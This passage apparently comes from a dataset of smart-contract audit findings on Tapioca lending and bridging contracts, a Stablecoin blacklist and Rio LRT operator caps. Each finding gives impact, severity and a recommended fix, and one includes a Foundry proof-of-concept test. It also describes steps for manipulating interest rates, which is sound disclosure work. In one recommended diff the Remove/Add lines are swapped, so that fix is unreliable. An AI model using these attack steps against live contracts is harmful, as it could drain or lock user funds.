succesfully exercising the option\\nOn the other hand, if the user decides to bridge the exercised option, the internal `_sendPacket()` function will be triggered, which will perform a call via LayerZero to the destination chain:\\n`// UsdoOptionReceiverModule.sol\\n\\nfunction _sendPacket(LZSendParam memory _lzSendParam, bytes memory _composeMsg, address _srcChainSender)\\n private\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n /// @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n \\n /// @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD, _srcChainSender\\n );\\n \\n /// @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n /// @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }`\\nThe problem with the approach followed when users want to bridge the exercised options is that the contract will not actually bridge the exercised `tapOft` tokens by calling the tapOft's `sendPacket()` function (which is the actual way by which the token can be transferred cross-chain). Instead, the contract calls `_sendPacket()` , a function that will try to perform a USDO cross-chain call (instead of a `tapOft` cross-chain call). This will make the `_debit()` function inside `_sendPacket()` be executed, which will try to burn USDO tokens from the msg.sender:\\n```\\n// OFT.sol \\n\\nfunction _debit(\\n uint256 _amountLD, \\n uint256 _minAmountLD,\\n uint32 _dstEid\\n ) internal virtual override returns (uint256 amountSentLD, uint256 amountReceivedLD) {\\n (amountSentLD, amountReceivedLD) = _debitView(_amountLD, _minAmountLD, _dstEid);\\n \\n // @dev In NON-default OFT, amountSentLD could be 100, with a 10% fee, the amountReceivedLD amount is 90,\\n // therefore amountSentLD CAN differ from amountReceivedLD.\\n \\n // @dev Default OFT burns on src.\\n _burn(msg.sender, amountSentLD);\\n }\\n```\\n\\nThis leads to two possible outcomes:\\n`msg.sender` (the LayerZero endpoint) has enough `amountSentLD` of USDO tokens to be burnt. In this situation, USDO tokens will be incorrectly burnt from the user, leading to a loss of balance for him. After this, the burnt USDO tokens will be bridged. This outcome greatly affect the user in two ways:\\nUSDO tokens are incorrectly burnt from his balance\\nThe exercised `tapOft` tokens remain stuck forever in the USDO contract because they are never actually bridged\\nThe most probable: `msg.sender` (LayerZero endpoint) does not have enough `amountSentLD` of USDO tokens to be burnt. In this case, an error will be thrown and the whole call will revert, leading to a DoS\\nProof of Concept\\nThe following poc shows how the function will be DoS'ed due to the sender not having enough USDO to be burnt. In order to execute the Poc, perform the following steps:\\nRemove the `_checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to));` line in UsdoOptionReceiverModule.sol's `exerciseOptionsReceiver()` function (it is wrong and related to another vulnerability)\\nPaste the following code in Tapioca-bar/test/Usdo.t.sol:\\n`// Usdo.t.sol\\n\\nfunction testVuln_exercise_option() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n //setup\\n {\\n deal(address(aUsdo), address(this), erc20Amount_);\\n\\n // @dev send TAP to tOB\\n deal(address(tapOFT), address(tOB), erc20Amount_);\\n\\n // @dev set `paymentTokenAmount` on `tOB`\\n tOB.setPaymentTokenAmount(erc20Amount_);\\n }\\n \\n //useful in case of withdraw after borrow\\n LZSendParam memory withdrawLzSendParam_;\\n MessagingFee memory withdrawMsgFee_; // Will be used as value for the composed msg\\n\\n {\\n // @dev `withdrawMsgFee_` is to be airdropped on dst to pay for the send to source operation (B->A).\\n PrepareLzCallReturn memory prepareLzCallReturn1_ = usdoHelper.prepareLzCall( // B->A data\\n IUsdo(address(bUsdo)),\\n PrepareLzCallData({\\n dstEid: aEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: SEND,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 0,\\n value: 0,\\n data: bytes(\"\"),\\n prevData: bytes(\"\"),\\n prevOptionsData: bytes(\"\")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n withdrawLzSendParam_ = prepareLzCallReturn1_.lzSendParam;\\n withdrawMsgFee_ = prepareLzCallReturn1_.msgFee;\\n }\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(erc20Amount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n ExerciseOptionsMsg memory exerciseMsg = ExerciseOptionsMsg({\\n optionsData: IExerciseOptionsData({\\n from: address(this),\\n target: address(tOB), \\n paymentTokenAmount: tokenAmountSD,\\n oTAPTokenID: 0, // @dev ignored in TapiocaOptionsBrokerMock\\n tapAmount: tokenAmountSD\\n }),\\n withdrawOnOtherChain: true,\\n lzSendParams: LZSendParam({\\n sendParam: SendParam({\\n dstEid: 0,\\n to: \"0x\",\\n amountLD: erc20Amount_,\\n minAmountLD: erc20Amount_,\\n extraOptions: \"0x\",\\n composeMsg: \"0x\",\\n oftCmd: \"0x\"\\n }),\\n fee: MessagingFee({nativeFee: 0, lzTokenFee: 0}),\\n extraOptions: \"0x\",\\n refundAddress: address(this)\\n }),\\n composeMsg: \"0x\"\\n });\\n bytes memory sendMsg_ = usdoHelper.buildExerciseOptionMsg(exerciseMsg);\\n\\n PrepareLzCallReturn memory prepareLzCallReturn2_ = usdoHelper.prepareLzCall(\\n IUsdo(address(aUsdo)),\\n PrepareLzCallData({\\n dstEid: bEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: PT_TAP_EXERCISE,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 500_000,\\n value: uint128(withdrawMsgFee_.nativeFee),\\n data: sendMsg_,\\n prevData: bytes(\"\"),\\n prevOptionsData: bytes(\"\")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n bytes memory composeMsg_ = prepareLzCallReturn2_.composeMsg;\\n bytes memory oftMsgOptions_ = prepareLzCallReturn2_.oftMsgOptions;\\n MessagingFee memory msgFee_ = prepareLzCallReturn2_.msgFee;\\n LZSendParam memory lzSendParam_ = prepareLzCallReturn2_.lzSendParam;\\n\\n (MessagingReceipt memory msgReceipt_,) = aUsdo.sendPacket{value: msgFee_.nativeFee}(lzSendParam_, composeMsg_);\\n\\n {\\n verifyPackets(uint32(bEid), address(bUsdo));\\n\\n vm.expectRevert(\"ERC20: burn amount exceeds balance\");\\n this.lzCompose(\\n bEid,\\n address(bUsdo),\\n oftMsgOptions_,\\n msgReceipt_.guid,\\n address(bUsdo),\\n abi.encodePacked(\\n OFTMsgCodec.addressToBytes32(address(this)), composeMsg_\\n )\\n ); \\n\\n }\\n\\n }`\\nRun the poc with the following command, inside the Tapioca-bar repo: `forge test --mt testVuln_exercise_option`\\nWe can see how the \"ERC20: burn amount exceeds balance\" error is thrown due to the issue mentioned in the report.чIf users decide to bridge their exercised tapOft, the sendPacket() function incorporated in the tapOft contract should be used instead of UsdoOptionReceiverModule's internal _sendPacket() function, so that the actual bridged asset is the tapOft and not the USDO.чHigh. As demonstrated, two critical outcomes might affect the user:\\n`tapOft` funds will remain stuck forever in the USDO contract and USDO will be incorrectly burnt from `msg.sender`\\nThe core functionality of exercising and bridging options always reverts and effectively causes a DoS.ч```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n -Not considering fees when wrapping mtOFTs leads to DoS in leverage executorsчmediumчWhen wrapping mtOFTs in leverage executors, fees are not considered, making calls always revert because the obtained assets amount is always smaller than expected.\\nTapioca will allow tOFTs and mtOFTs to act as collateral in some of Tapioca's markets, as described by the documentation. Although regular tOFTs don't hardcode fees to 0, meta-tOFTs (mtOFTs) could incur a fee when wrapping, as shown in the following code snippet, where `_checkAndExtractFees()` is used to calculate a fee considering the wrapped _amount:\\n```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n\\nWhen fees are applied, the amount of `mtOFTs` minted to the caller won't be the full `_amount`, but the `_amount - feeAmount`.\\nTapioca's leverage executors are required to wrap/unwrap assets when tOFTs are used as collateral in order to properly perform their logic. The problem is that leverage executors don't consider the fact that if collateral is an `mtOFT`, then a fee could be applied.\\nLet's consider the `BaseLeverageExecutor` ****contract (who whas the `_swapAndTransferToSender()` function, called by all leverage executors):\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\n\\nAs we can see in the code snippet, if the user requires to wrap the obtained swapped assets by setting `swapData.toftInfo.isTokenOutToft` to `true`, then the internal `_handleToftWrapToSender()` function will be called. This function will wrap the tOFT (or mtOFT) and send it to `msg.sender` or `address(this)`, depending on the user's `sendBack` input:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nThe problem here is that if `tokenOut` is an mtOFT, then a fee might be applied when wrapping. However, this function does not consider the `wrap()` function return value (which as shown in the first code snippet in this report, whill return the actual minted amount, which is always `_amount - feeAmount` ).\\nThis leads to a vulnerability where contracts performing this wraps will believe they have more funds than the intended, leading to a Denial of Service and making the leverage executors never work with mtOFTs.\\nLet's say a user wants to lever up by calling BBLeverage.sol's `buyCollateral()` function:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n \\n\\n // rest of code\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max); \\n \\n \\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); \\n address(asset).safeApprove(address(yieldBox), 0); \\n \\n // rest of code\\n } \\n```\\n\\nAs we can see, the contract will call `leverageExecutor.getCollateral()` in order to perform the swap. Notice how the value returned by `getCollateral()` will be stored in the amountOut variable, which will later be converted to `collateralShare` and deposited into the `yieldBox`.\\nLet's say the `leverageExecutor` in this case is the `SimpleLeverageExecutor.sol` contract. When `getCollateral()` is called, `SimpleLeverageExecutor` will directly return the value returned by the internal `_swapAndTransferToSender()` function:\\n`// `SimpleLeverageExecutor.sol`\\n\\nfunction getCollateral( \\n address assetAddress,\\n address collateralAddress,\\n uint256 assetAmountIn,\\n bytes calldata swapperData \\n ) external payable override returns (uint256 collateralAmountOut) {\\n // Should be called only by approved SGL/BB markets.\\n if (!cluster.isWhitelisted(0, msg.sender)) revert SenderNotValid();\\n return _swapAndTransferToSender(true, assetAddress, collateralAddress, assetAmountIn, swapperData);\\n } `\\nAs seen in the report, `_swapAndTransferToSender()` won't return the amount swapped and wrapped, and will instead only return the amount obtained when swapping, assuming that wraps will always mint the same amount:\\n`// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n \\n ...\\n \\n amountOut = swapper.swap(swapperData, amountIn, swapData.minAmountOut);\\n \\n ...\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } `\\nIf the tokenOut is an mtOFT, the actual obtained amount will be smaller than the `amountOut` stored due to the fees that might be applied.\\nThis makes the `yieldBox.depositAsset()` in `BBLeverage.sol` inevitably always fail due to not having enough funds to deposit into the YieldBox effectively causing a Denial of ServiceчConsider the fees applied when wrapping assets by following OFT's API, and store the returned value by `wrap()`. For example, `_handleToftWrapToSender()` could return an integer with the actual amount obtained after wrapping:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal returns(uint256 _amountOut) {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n// Remove the line below\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n// Add the line below\\n _amountOut = ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n// Remove the line below\\n _amountOut = ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n// Add the line below\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nAnd this value should be the one stored in _swapAndTransferToSender()'s amountOut:\\n```\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n// Remove the line below\\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n// Add the line below\\n amountOut = _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\nчHigh. The core functionality of leverage won't work if the tokens are mtOFT tokens.ч```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n -Secondary Big Bang market rates can be manipulated due to not triggering penrose.reAccrueBigBangMarkets(); when leveragingчmediumчSecondary market rates can still be manipulated via leverage executors because `penrose.reAccrueBigBangMarkets()` is never called in the leverage module.\\nThe attack described in Tapioca's C4 audit 1561 issue and also described in Spearbit's audit 5.2.16 issue is still possible utilizing the leverage modules.\\nAs a summary, these attacks described a way to manipulate interest rates. As stated in Tapioca's documentation, the interest rate for non-ETH markets is computed considering the current debt in ETH markets. Rate manipulation could be performed by an attacker following these steps:\\nBorrow a huge amount in the ETH market. This step did not accrue the other markets.\\nAccrue other non-ETH markets. It is important to be aware of the fact that non-ETH markets base their interest calculations considering the total debt in the ETH market. After step 1, the attacker triggers an accrual on non-ETH markets which will fetch the data from the greatly increased borrow amount in the ETH market, making the non-ETH market see a huge amount of debt, thus affecting and manipulating the computation of its interest rate.\\nThe fix introduced in the C4 and Spearbit audits incorporated a new function in the Penrose contract to mitigate this issue. If the caller is the `bigBangEthMarket`, then the internal `_reAccrueMarkets()` function will be called, and market's interest rates will be accrued prior to performing any kind of borrow. Following this fix, an attacker can no longer perform step 2 of accruing the markets with a manipulated rate because accrual on secondary markets has already been triggered.\\n```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n\\nAlthough this fix is effective, the attack is still possible via Big Bang's leverage modules. Leveraging is a different way of borrowing that still affects a market's total debt. As we can see, the `buyCollateral()` function still performs a `_borrow()`, thus incrementing a market's debt:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n {\\n (, uint256 borrowShare) = _borrow( \\n calldata_.from, \\n address(this), \\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n ); \\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n \\n // rest of code\\n }\\n```\\n\\nBecause Penrose's `reAccrueBigBangMarkets()` function is not called when leveraging, the attack described in the C4 and Spearbit audits is still possible by utilizing leverage to increase the ETH market's total debt, and then accruing non-ETH markets so that rates are manipulated.чIt is recommended to trigger Penrose's reAccrueBigBangMarkets() function when interacting with Big Bang's leverage modules, so that the issue can be fully mitigated.чMedium. A previously found issue is still present in the codebase which allows secondary Big Bang markets interest rates to be manipulated, allowing the attacker to perform profitable strategies and potentially affecting users.ч```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n -`TOFTMarketReceiverModule::marketBorrowReceiver` flow is brokenчmediumчThe `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract.\\n`TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken.\\nLet's examine it more closely:\\nAfter checking the whitelisting status for the `marketHelper`, `magnetar` and the `market` contracts an approval is made to the Magnetar contract.\\n`MagnetarCollateralModule::depositAddCollateralAndBorrowFromMarket` get called with the passed parameters.\\nIf the `data.deposit` is true, the Magnetar contract will call `_extractTokens` with the following params: `from = msg_.user`, `token = collateralAddress` and `amount = msg_.collateralAmount`.\\n```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n\\nThe collateral gets transferred into the Magnetar contract in case the `msg._user` has given sufficient allowance to the Magnetar contract through the Pearlmit contract.\\nAfter this `_setApprovalForYieldBox(data.market, yieldBox_);` is called that sets the allowance of the Magnetar contract to the Market contract.\\nThen `addCollateral` is called on the Market contract. I've inlined the internal function to make it easier to follow:\\n```\\n function _addCollateral(address from, address to, bool skim, uint256 amount, uint256 share) internal {\\n if (share == 0) {\\n share = yieldBox.toShare(collateralId, amount, false);\\n }\\n uint256 oldTotalCollateralShare = totalCollateralShare;\\n userCollateralShare[to] += share;\\n totalCollateralShare = oldTotalCollateralShare + share;\\n\\n // yieldBox.transfer(from, address(this), _assetId, share);\\n bool isErr = pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nAfter the `userCollateralShare` mapping is updated `pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);` gets called.\\nThis is critical as now the Magnetar is supposed to transfer the ERC1155 tokens(Yieldbox) to the Market contract.\\nIn order to do this the Magnetar contract should have given the allowance to the Market contract through the Pearlmit contract.\\nThis is not the case, the Magnetar has only executed `_setApprovalForYieldBox(data.market, yieldBox_);`, nothing else.\\nIt will revert inside the Pearlmit contract `transferFromERC1155` function when the allowance is being checked.\\nOther occurrences\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` has a similar issue as:\\nExtract the bbCollateral from the user, sets approval for the BigBang contract through YieldBox.\\nBut then inside the `BBCollateral::addCollateral` the `_addTokens` again expects an allowance through the Pearlmit contract.\\n`TOFT::lockAndParticipateReceiver` calls the `Magnetar:lockAndParticipate` where:\\n```\\n## MagnetarMintCommonModule.sol\\n\\nfunction _lockOnTOB(\\n IOptionsLockData memory lockData,\\n IYieldBox yieldBox_,\\n uint256 fraction,\\n bool participate,\\n address user,\\n address singularityAddress\\n ) internal returns (uint256 tOLPTokenId) {\\n // rest of code.\\n _setApprovalForYieldBox(lockData.target, yieldBox_);\\n tOLPTokenId = ITapiocaOptionLiquidityProvision(lockData.target).lock(\\n participate ? address(this) : user, singularityAddress, lockData.lockDuration, lockData.amount\\n );\\n}\\n\\n## TapiocaOptionLiquidityProvision.sol\\n\\nfunction lock(address _to, IERC20 _singularity, uint128 _lockDuration, uint128 _ybShares)\\n external\\n nonReentrant\\n returns (uint256 tokenId)\\n{\\n // Transfer the Singularity position to this contract\\n // yieldBox.transfer(msg.sender, address(this), sglAssetID, _ybShares);\\n {\\n bool isErr =\\n pearlmit.transferFromERC1155(msg.sender, address(this), address(yieldBox), sglAssetID, _ybShares);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nThe same issue where approval through the Pearlmit contract is expected.чReview all the allowance mechanisms and ensure that they are correct.чThe `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract. There are also other instances of similar issues.ч```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n -Blacklisted accounts can still transact.чmediumчAccounts that have been blacklisted by the `BLACKLISTER_ROLE` continue to transact normally.\\nCurrently, the only real effect of blacklisting an account is the seizure of `Stablecoin` funds:\\n```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n\\nHowever, following a call to `addBlackList(address)`, the blacklisted account may continue to transact using `Stablecoin`.\\nCombined with previous audit reports, which attest to the blacklist function's susceptibility to frontrunning, the current implementation of the blacklist operation can effectively be considered a no-op.чERC20s that enforce blacklists normally prevent a sanctioned address from being able to transact:\\n📄 Stablecoin.sol\\n```\\n// Add the line below\\n error Blacklisted(address account);\\n\\n// Add the line below\\nfunction _update(address from, address to, uint256 value) internal virtual override {\\n// Add the line below\\n\\n// Add the line below\\n if (blacklisted(from)) revert Blacklisted(from); \\n// Add the line below\\n if (blacklisted(to)) revert Blacklisted(to);\\n// Add the line below\\n\\n// Add the line below\\n super._update(from, to, value);\\n// Add the line below\\n}\\n```\\nчMedium, as this the failure of a manually administered security feature.ч```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n -Setting the strategy cap to \"0\" does not update the total shares held or the withdrawal queueчhighчRemoving or setting the strategy cap to 0 will not decrease the shares held in the system. Additionally, it will not update the withdrawal queue, which means users can request withdrawals, and the withdrawals will exceed the allocated amount when rebalance occurs.\\nLet's go over the issue with an example:\\nAssume there is 1 strategy and 2 operators active in an LSR with total strategy shares holding is 1000 * 1e18 where both operators shares 500-500 the assets.\\nWhen the owner decides to inactivate or just simply sets one of the operators cap to \"0\" the operator will withdraw all its assets as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . \\n // @review this \"if\" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n .\\n // @review asks delegator to exit\\n -> bytes32 withdrawalRoot = delegator.queueWithdrawalForOperatorExit(strategy, sharesToExit);\\n emit IRioLRTOperatorRegistry.OperatorStrategyExitQueued(operatorId, strategy, sharesToExit, withdrawalRoot);\\n }\\n```\\n\\nThen the operator delegator contract calls the EigenLayer to withdraw all its balance as follows:\\n```\\nfunction _queueWithdrawalForOperatorExitOrScrape(address strategy, uint256 shares) internal returns (bytes32 root) {\\n . // @review jumps to internal function\\n -> root = _queueWithdrawal(strategy, shares, address(depositPool()));\\n }\\n\\nfunction _queueWithdrawal(address strategy, uint256 shares, address withdrawer) internal returns (bytes32 root) {\\n 